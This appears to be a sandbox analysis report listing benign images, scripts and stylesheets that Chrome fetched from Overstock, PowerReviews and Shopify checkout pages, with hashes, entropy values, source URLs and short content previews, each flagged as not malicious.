                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....P....*P.P.>-..B.......bZ@4.j.....c.........t...$.i.XC.....%...K...r...?...n.k.59:_.: .O{}..U!$...P.Ig(........-._...Z..b.........NE.....{......_.[k..%.."...=s1......&..2........Y.....X.......L2u$...x.j..l.dUq.L.v%...`..).Y~..&2:Y....).y....*h..Up.C.yK...l..8..f..P..b.....7...&y%1_fK2..... .4...R.%..|.5&H^...'..1G.L...Wd.t.)@......j.O.). W..bwI...N..+.TJHU..s=T..B.J9.S. ....p...=X.>.EW;e.7.Esy.._.....9N.z..b..._.........$t[E.)...P.b.b7).|..{..........=...o...)..E....EXIF....Exif..II*...............
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1486
                                                                                                                                                                                    Entropy (8bit):6.639201153633656
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:gTCIl/X2YlXWI2PUBFvuiqmJGhJnQUHEwYR6PPgj5L0spn/Y6hLev:lIl/Xflt7EaWg+u/av
                                                                                                                                                                                    MD5:5F3CF30E7F6E70ED77E697106BA54E2A
                                                                                                                                                                                    SHA1:119A2EA441C215D4F996DF10EEE68F4964B23148
                                                                                                                                                                                    SHA-256:901E5D10DFF7CB745F92EA236CE291279B3D5F7DFF2CD42E730EBD5DC8B747B4
                                                                                                                                                                                    SHA-512:A55ACA289C42CE5181EE1E54FF0124CAEBE61B9165158F895253B251F2AD98BBA2C19AA55E69D3FFEA480E87AA395164ECB0CF60E8DFBE252289A126469287C9
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_1417e58b-bcf1-4aed-bd23-5441e98617ea.jpg?v=1729322978&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 6........*P.P.>1..B.!!.... ....j..+..........6..$......@.W...g......jh.N~....i8{..Q{4............l..}....-M...uq.y6.[t:.r..-....f..K|<.N..0......x.KmbP.N+.L.UVet.A2.........4.T.,]m.}8...^.@v.?.....R......F.ox7...Q...|'V/.....?-.....<.p...o>._..._......p}F0..;.G/.G....g.Xg...=.....? ..*..Z......D...~F'...x.. .V..s.q..:...C.:..>.(^F.JK...&.-..).a.../..1Oj...y..[}:E...d...>...4.....Gm.3.`....yq..bc....'.K1.g............]Ph..4_.]:..u...l...:.7B$."..$...I..J`j...O8..Y&.C..V..5mA..fk...6..2K.4k..94.....T.{.kO.T{....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2180
                                                                                                                                                                                    Entropy (8bit):6.938968397423554
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxtipvnG8nJOuAf8a7PAnodscI2Cg:NBIl/Xrx4pRANfHAnPcLCg
                                                                                                                                                                                    MD5:ED4F1A79C5A36FE547E658FAAFDB324E
                                                                                                                                                                                    SHA1:628A69AC2FAAD2D938C2363C17A153C1653BC62B
                                                                                                                                                                                    SHA-256:9A3E895F633E77728819B73B96D76F73768D2587E83CBF83EBE375A299415290
                                                                                                                                                                                    SHA-512:6C5C0C15478140A7ABBEE97C95F176686838F30DDA59F717F2DEDA26E39F99C928F315230EE2ECB166E88ABF874AAE36EAEA22274C8B4C6FCD5EAE18AB3AF6B3
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...................................................................................t..T.O....,..oJ..F...5G.k.'.?.t. .......e.}}J.....(...iY..E...l.bs.%......E..Y.^?WGm..Yx.........~......s.mc.V'=0|..{g..1.e..5Y..K&.X
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65451)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):480564
                                                                                                                                                                                    Entropy (8bit):5.586242342957384
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:4irWVpSxWvnoOS6P2oox/35xSAwp+FKk1v9UdN243yScJBrqs9zWUN7DAtaFriz:4irWV4xWvnNyjULz
                                                                                                                                                                                    MD5:AAECB8102FDA237E7B9051A60E1770EF
                                                                                                                                                                                    SHA1:F43A7E6F1FE5889D93455D224FE27345A14F92CD
                                                                                                                                                                                    SHA-256:D4EAA8A575D4A340E2E5DEFEC8A9767133B5F916CD9E8CFEC939BCECEFFAC76A
                                                                                                                                                                                    SHA-512:D283F405CEC8BF9E2F887C059BC235B234C12CD84D437B4B2DAEF1068F293D5BBC6BBDD544632D5155B008C6289411197E8AA1056CF2520EA984F8B1E80646C8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/overstock-desktop-header.d4eaa8a575d4a340e2e5defec8a9767133b5f916cd9e8cfec939bceceffac76a.js
                                                                                                                                                                                    Preview:/*! For license information please see overstock-desktop-header.js.LICENSE.txt */.(()=>{var e={5892:function(e,t,n){"use strict";var o=this&&this.__awaiter||function(e,t,n,o){return new(n||(n=Promise))((function(r,i){function a(e){try{l(o.next(e))}catch(e){i(e)}}function s(e){try{l(o.throw(e))}catch(e){i(e)}}function l(e){var t;e.done?r(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(a,s)}l((o=o.apply(e,t||[])).next())}))},r=this&&this.__generator||function(e,t){var n,o,r,i,a={label:0,sent:function(){if(1&r[0])throw r[1];return r[1]},trys:[],ops:[]};return i={next:s(0),throw:s(1),return:s(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function s(s){return function(l){return function(s){if(n)throw new TypeError("Generator is already executing.");for(;i&&(i=0,s[0]&&(a=0)),a;)try{if(n=1,o&&(r=2&s[0]?o.return:s[0]?o.throw||((r=o.return)&&r.call(o),0):o.next)&&!(r=r.call(o,s[1])).done)return r;switch(o=0,r&&(s=[2&s[0],r.value]),s[0]){case
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (25146), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):25146
                                                                                                                                                                                    Entropy (8bit):5.267249508481853
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:jf/+3YsQyoAE/rZfdWnXGM94ItmVTDrDAwibmYOMuo58G9IR9BalVVTwwbsi+weZ:A4I+XARuRbCVVJX5UrBWWJfvY6
                                                                                                                                                                                    MD5:C728D611649D157B7985BA77AFAE37C6
                                                                                                                                                                                    SHA1:9F4B355D0466B9D864A5E8CFF3784E9BB3EE070B
                                                                                                                                                                                    SHA-256:552DEAD41FB5C1A05DCC8FC792452DE80B591B2384280D59A38309400B249A00
                                                                                                                                                                                    SHA-512:BDBDF7321882E00E2318792CF950A55504A3BE2E84553FEAE0B0B8A6E9ED2436911EA01CD9572E63FA6925400C0DB03172CB6FE4440E3A09B1F4DEF164289A7F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/page-triggers.367.chunk.552dead41fb5c1a05dcc8fc792452de80b591b2384280d59a38309400b249a00.js
                                                                                                                                                                                    Preview:(self.webpackChunkpage_triggers=self.webpackChunkpage_triggers||[]).push([[367],{9064:function(e){e.exports=function(e){if(null==e)throw new TypeError("Cannot destructure undefined")},e.exports.__esModule=!0,e.exports.default=e.exports},9465:function(e,n,t){"use strict";t.r(n);var a=t(8081),l=t.n(a),o=t(3645),r=t.n(o)()(l());r.push([e.id,".cl-form-field {\n align-items: center;\n background-color: #fff;\n border: 1px solid #dadcdf;\n border-radius: 4px;\n display: flex;\n flex-basis: 100%;\n position: relative;\n transition: border-color 0.15s cubic-bezier(0.4, 0, 0.2, 1);\n}\n.cl-form-field-disabled {\n background: transparent;\n opacity: 0.5;\n pointer-events: none;\n}\n.cl-form-field-focus {\n border-color: #2f3337;\n}\n.cl-form-control-error .cl-form-field {\n border-color: #c7202c;\n}\n.cl-form-floating-label {\n left: 8px;\n max-width: calc(100% - 16px);\n position: absolute;\n top: 0;\n}\n.cl-form-floating-label::before {\n background-color: rgba(255, 255, 255,
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (39697)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):136265
                                                                                                                                                                                    Entropy (8bit):5.4579040090972
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Q5/+JU5hLofQru1CKsJ9nJbjMJZyDv4OvVX47USYsk49HQse00:Q5/+JUPLDoIDvUHQsn0
                                                                                                                                                                                    MD5:F9A7ED66DD7A1D0D455909151E237716
                                                                                                                                                                                    SHA1:E416BFBC43087EC32183621A3DFD080C14D2155D
                                                                                                                                                                                    SHA-256:712F2DF6C9B6EBCB88B1C6173328752C352C2EC22E3C50CB5AFC934DD056F684
                                                                                                                                                                                    SHA-512:92A427AF8B0945D0CE385573603597E118D373AE163B282D66530600F88B01673CD243930C6BCF2F8367A05DAC4647FEE346681BB481BAC2E3681BDD46470710
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/tag-builds/10461/4.1/js/chunks/engine.js
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */.(self.pwrClg=self.pwrClg||[]).push([[976],{71387:e=>{e.exports={cloudinaryUploadBase:"https://api.cloudinary.com/v1_1/powerreviews/auto/upload",cloudinaryDownloadBase:"https://media.powerreviews.com",local:{name:"local",entryPath:"https://localhost:3001/",assetPath:function(){return"https://localhost:3001/"},akamaiUIBase:"https://localhost:3001",awsUIBase:"https://localhost:3001",writeBase:"https://devwriteservices.powerreviews.com",b2cReadBase:"https://dev-origin-readservices-b2c-api.powerreviews.com",b2cReadOrigin:"https://dev-origin-readservices-b2c-api.powerreviews.com",b2cReadOS:"https://dev-display-api.powerreviews.io",b2cReadProxy:"https://devui.powerreviews.com/api/",cloudinaryImagePreset:"dev_preset",cloudinaryVideoPreset:"dev_video_preset",trackingBase:"https://t-dev.powerreviews.com",servicesBase:"https://qaservices.powerreviews.com/JSController.do",uiPRBase:"https://localhost:3001",versionFullJS
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (7952)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7953
                                                                                                                                                                                    Entropy (8bit):5.289194478596396
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:2SEGbpRn66PHrfphKP2GeN5rVYkph4xjmNsTbDE21RyEOnHyyU2O9:2SEGN5PLfvKOGe77h4xzTqQ2k
                                                                                                                                                                                    MD5:E67FC8779D4185698C3FC0BEAEB72508
                                                                                                                                                                                    SHA1:0813A4883D2A436C56F4E7AC5289A5D4556F1C21
                                                                                                                                                                                    SHA-256:2BE02C2ED131EC9C7A3D78C99A74123F486FF66EB3758E17412EE1AD9A3A13C5
                                                                                                                                                                                    SHA-512:A661D5895E791B05EA6221810E390EA8D8ED1B2863E3A2DA256BFA4A64977832AF5841228560FA0CFA33D0F5758D8530D1091556CBFF93724AA070D6444082A8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/DutyOptions.Cry_EOBi.js
                                                                                                                                                                                    Preview:import{A as E,ba as J,aW as V,J as H,y as F,e as b,b1 as $,D as W,a as e,aU as Z,aa as K,dh as X,a8 as C,aP as Y,cc as O,cu as ee,d4 as ie,bj as ne,ab as M,aS as te,aV as re,ce as x,az as z,cb as se,di as oe,cZ as ae,T as pe,aG as ce,ci as B,dj as le,c9 as ue,u as de,dk as he,a4 as ge,a3 as ye,dl as fe,a_ as me,dm as Se,d as _e,at as ve,q as be,dn as I,dp as De}from"./app.DfgMZONA.js";import{S as Pe,a as k}from"./SubscriptionPriceBreakdown.CxrCP-xw.js";import{S as Ce,D as Re}from"./useAmazonContact.ysZ2sjoF.js";const Le={id:"ca32d1a1360abc73acf9c215a92ce9283175d9aa48b70e909517b6ccfe9467a7",type:"query",name:"ShippingRatesStatusQuery",source:"query ShippingRatesStatusQuery($token:String!){shippingRatesStatus(token:$token)}"},Ie=i=>{const t=E(!1),o=E(!1),r=E(0),a=J(),{value:n,loading:p}=V(),{negotiate:u}=H();return F(()=>{o.current=p},[p]),F(()=>{let c;n&&n.status==="filled"&&n.intermediateRates&&n.shippingRatesStatusToken&&n.progressiveRatesEstimatedTimeUntilCompletion?(t.current=!0,r.c
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (27586)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):76308
                                                                                                                                                                                    Entropy (8bit):5.121941798929058
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:No2mJy+LTVAtiTO260aZCX5J7wqCeys1jzIvbAJdJb2AZzWqF4xpkbe+8ZEPkwLZ:NoYGZTTfLJb20zWqF4/kbe+8Va
                                                                                                                                                                                    MD5:517D6C00EC87B6B88AD15327F885B936
                                                                                                                                                                                    SHA1:6BC58936FC2C9EA88A41096607D755DAF2B9816B
                                                                                                                                                                                    SHA-256:982475B3A1A336D50AF3550801E6182A628518D603514E5269431AB454E7FA7A
                                                                                                                                                                                    SHA-512:6A3F90AED331DEC56067CE7F76D5E865559318CBA24EFF3F76683B49E61611F74A96631BC28A4BB3659B905B188087C653D75E348939209798EFA05BB38D1E2B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*!. * Flickity PACKAGED v2.3.0. * Touch, responsive, flickable carousels. *. * Licensed GPLv3 for open source use. * or Flickity Commercial License for commercial use. *. * https://flickity.metafizzy.co. * Copyright 2015-2021 Metafizzy. */(function(window2,factory22){typeof define=="function"&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(jQuery){return factory22(window2,jQuery)}):typeof module=="object"&&module.exports?module.exports=factory22(window2,require("jquery")):window2.jQueryBridget=factory22(window2,window2.jQuery)})(window,function(window2,jQuery){"use strict";var arraySlice=Array.prototype.slice,console2=window2.console,logError=typeof console2=="undefined"?function(){}:function(message){console2.error(message)};function jQueryBridget(namespace,PluginClass,$){if($=$||jQuery||window2.jQuery,!$)return;PluginClass.prototype.option||(PluginClass.prototype.option=function(opts){$.isPlainObject(opts)&&(this.options=$.extend(!0,this.options,opts))}),$.fn[
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):163
                                                                                                                                                                                    Entropy (8bit):5.297552459436421
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:US9i3USqmKcDXRvFqMPfFQTcZ+1RyUFvNFBIADNHG2JCYWAJDE2JCn+9VRNiWTEc:UXUoKf8fFGpbdvvB91DMKM+3riWwM9I2
                                                                                                                                                                                    MD5:3FFE69064BB323E26EBDDE40AECB8628
                                                                                                                                                                                    SHA1:A5E4370DD1416A345A2F41148BE5B67893C96A7A
                                                                                                                                                                                    SHA-256:FF99032B0E0EC65E9A0B4800B2A497F77556908A10D1458CB2C2DC0D458C3F2A
                                                                                                                                                                                    SHA-512:61F521E411637D77D7EE56AFCB75DCC2716D65C0E2C14FA3AFE589C7CF94496B19D1587A8EF89A3F6C344978E74CF74FF3C6A8960E16D1A9065CD55864E152F1
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/tag-builds/10461/4.1/js/chunks/136.js
                                                                                                                                                                                    Preview:/*!. * PowerReviews, Copyright 2024. * Build: 10461 | a4644180a | 10/3/2024. */."use strict";(self.pwrClg=self.pwrClg||[]).push([[136],{60136:(s,l,r)=>{r.r(l)}}]);
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1928
                                                                                                                                                                                    Entropy (8bit):6.692292400386552
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZfKsZmDRj9f8mx292jBzcEqndkpSZudrtSPLBDy/tf5fC:NBIl/XflVx1x+R5kmx2whqnCRBqmU3
                                                                                                                                                                                    MD5:46FC776F3708087D1EC97A1ECAD7A9AE
                                                                                                                                                                                    SHA1:D50F71A9C226B425389E37D78B39C163FBE5E31C
                                                                                                                                                                                    SHA-256:DD75F59DA52CEBCD109FB1CB2BB48A320F5264C7A4495E4A0C529D3E73DF55B7
                                                                                                                                                                                    SHA-512:CDE1AA41E396602F6D3C9297D7CF28BF5185AAFB1BA49245AF02E45ED5D13B5F8B033EFB45331F03EBF67F13AAAAF6CE86A8924060567469739C5BBF28D2BF43
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P.................................................................................,..........#.Y......s..zg...Z....$........A.k..,.K.7.z.......W.....*%f....u.1.k.^_6..\.>.Y|n*..a..l.^Yg6.h.*...%&5.......(..1
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (8118)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):8231
                                                                                                                                                                                    Entropy (8bit):4.9327288236627655
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:gOgT+q++4xbFAJW7S4S+HLFqSswjDC3InqRUsctNt/tCEtSFVxdxQMfiJyo5+6Dc:x32tVkVimW
                                                                                                                                                                                    MD5:C2E16B537E928F660ED795CDBCAB4C7D
                                                                                                                                                                                    SHA1:ECEE6045567F208C8BDFA3A430AEA36A96BC23F6
                                                                                                                                                                                    SHA-256:886434CB772E92D78810AC466B661D12D02F533918868E4DE70B8B730E0CD3B7
                                                                                                                                                                                    SHA-512:E8BF964A697D1AF53C326C02721AB749460E7F061BF1D61FE6B830C2C2E362D793F25D6AE2EF5E2EAA44F651592CC6B91DF991D4C4CA1EDBF3E359179DA72FC6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/t/224/assets/featured-product-banner.css?v=129237341711239768241730157903
                                                                                                                                                                                    Preview:.featured-product-banner__wrapper,.featured-product-banner-block{display:flex;flex-direction:column;padding:0}.featured-product-banner-product{display:flex;gap:var(--column-gap);padding:24px 20px 32px;background:#f5f6f7}.featured-product-banner__wrapper{position:relative;row-gap:30px;padding:0;margin-bottom:30px;gap:var(--column-gap)}.featured-product-banner__wrapper:after{content:"";display:inline-block;position:absolute;bottom:0;left:20px;width:calc(100% - 40px);height:1px;background-color:#dadcdf}.featured-product-banner-block{justify-content:center;padding:20px;background-color:rgba(var(--bg-color));color:rgb(var(--text-color));gap:20px}.featured-product-banner-block__heading{margin:0;font-size:3.4rem;color:var(--text-color)}.featured-product-banner-block__subheading{margin:0;font-size:1.6rem}.featured-product-banner .featured-product-banner__reviews{min-height:14px;padding:0;margin-top:0}.featured-product-banner .p-w-r .pr-snippet-stars,.featured-product-banner .p-w-r .pr-snippet
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (12847)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):12848
                                                                                                                                                                                    Entropy (8bit):5.218715515901815
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:4QHSkTZJ9gaL0t26pBP8dWQPq33gr+WSILVHPBWo:3DZDgaL0pro
                                                                                                                                                                                    MD5:7228D18B2B22DA6298EB9493D1175863
                                                                                                                                                                                    SHA1:FFFBE78B7FE44573640B8DC5EE62FD48828A933B
                                                                                                                                                                                    SHA-256:6D45F0D60087514FE5330FD16E9F4D19E212FF164844D2BF14BB11B3E4441055
                                                                                                                                                                                    SHA-512:28F2383FC6704FFAF9D03F48BC378C698D8AA2488F04E0E36F26002E39400AB4C77AC748E54C8F4E51FF34D8F49678A23E956E99F7A22255D619B11804D39CCC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/DeliveryMethodSelectorSection.DNerkzQV.css
                                                                                                                                                                                    Preview:.rdvNk{animation:_2RkQB .1s .25s linear 6;position:relative;width:24px}[dir=ltr] .rdvNk:after{right:.3rem}[dir=rtl] .rdvNk:after{left:.3rem}.rdvNk:after{content:"";position:absolute;top:-.2rem;height:.7rem;width:.7rem;background-color:var(--x-default-color-text);border:1px solid var(--x-default-color-background);border-radius:50%;animation:i0YRL .4s .85s both}@keyframes i0YRL{0%{opacity:0;transform:scale(.5)}40%{transform:scale(1.1)}to{opacity:1;transform:scale(1)}}@keyframes _2RkQB{0%,to{transform:rotate(10deg)}50%{transform:rotate(-10deg)}}.rMk2p{border-radius:var( --x-express-checkout-button-border-radius, var( --x-primary-button-border-radius, var(--x-global-border-radius, var(--x-border-radius-base)) ) )}.vT2w7{border:1px transparent solid;border-radius:var( --x-express-checkout-button-border-radius, var( --x-primary-button-border-radius, var(--x-global-border-radius, var(--x-border-radius-base)) ) );background-size:100% 60%;background-repeat:no-repeat;background-position:50% 50%}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 640x640, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):26359
                                                                                                                                                                                    Entropy (8bit):7.728409269503313
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:EXaWAHs6o61dsDngsIG7yoKPrQcbaPOsWRfH:E9eY61dsDLGRccbaPOsm
                                                                                                                                                                                    MD5:9B4158DACD3C7FE9043EC7F078D5BBC6
                                                                                                                                                                                    SHA1:6A12E4B3B0B06A382CDBEDA53F2608753B56A533
                                                                                                                                                                                    SHA-256:3EBFB06C6D681369ACC859B8AFD29C9A4EC331E9262E5D07CDC0339BD61C9736
                                                                                                                                                                                    SHA-512:08E60092CDD725D312F328802E4BA112D2E3C16B36EBD04B83B7D9115306F429954A14F10B49BC556125D84CDC070464F0FAF6FD83EC71BCF814506A160E4B56
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100............................................ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}..........................................................................................,.........................................................................................................................................
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2150
                                                                                                                                                                                    Entropy (8bit):6.905048796790183
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxwRga/e9SIx0FDhel3umX6dcx:NBIl/Xrxw3/ew2l3u12
                                                                                                                                                                                    MD5:6C2F910E88447746E247436DCAABD68B
                                                                                                                                                                                    SHA1:44E68C54EF1C205C329BEDE07A135A5370AE7F0F
                                                                                                                                                                                    SHA-256:475BA4A16EBAEEB6D25E0100F209A8744449AE814D24B4D82D82EEE784C18F5A
                                                                                                                                                                                    SHA-512:A8C9906C00984BCAACC40F0535EEECBF38781866D702CDBD7776AC5E6D0312A2A7C4D4101B922CE58B9B8438254110479AF22A303E9D039CC19B43254ED3C89E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P.................................................................................`....(.*.;.L...I.o.l.Lv.d...<.lH..........,.,...k.T..W&...K......,......,....~~,.I-u.!.%Kv....o2`.B ..%..jv5.5....E...h.7.Ob..I......L..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (9712)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):9713
                                                                                                                                                                                    Entropy (8bit):5.234912191106589
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:l5Y2EWUESSsoEeek1JpdrEda0nIgJpI1ik8c/oUrlzO3wpBgnHcL:lqdWjSSso/FrEdawDJpuH8orlzO3wbeO
                                                                                                                                                                                    MD5:51257EADCB7607614405EF1015D34511
                                                                                                                                                                                    SHA1:741E2A2CBF49658F4B00E46A89DAA084158B7005
                                                                                                                                                                                    SHA-256:E0B8CC3E0B1F2BD8DBE168FB1363E70222DF971EA8498D6EB1127EB371264233
                                                                                                                                                                                    SHA-512:BF82DD8869485DA8A7AF06B36E763FC51EE9C1F20BD4E1A63BFDEAA3D986237D6C75A2EC186F346CB9786DEE6ED2A934E28406CA69523AC809F497EA761D41CC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/hooks.CJ9fMJ3B.js
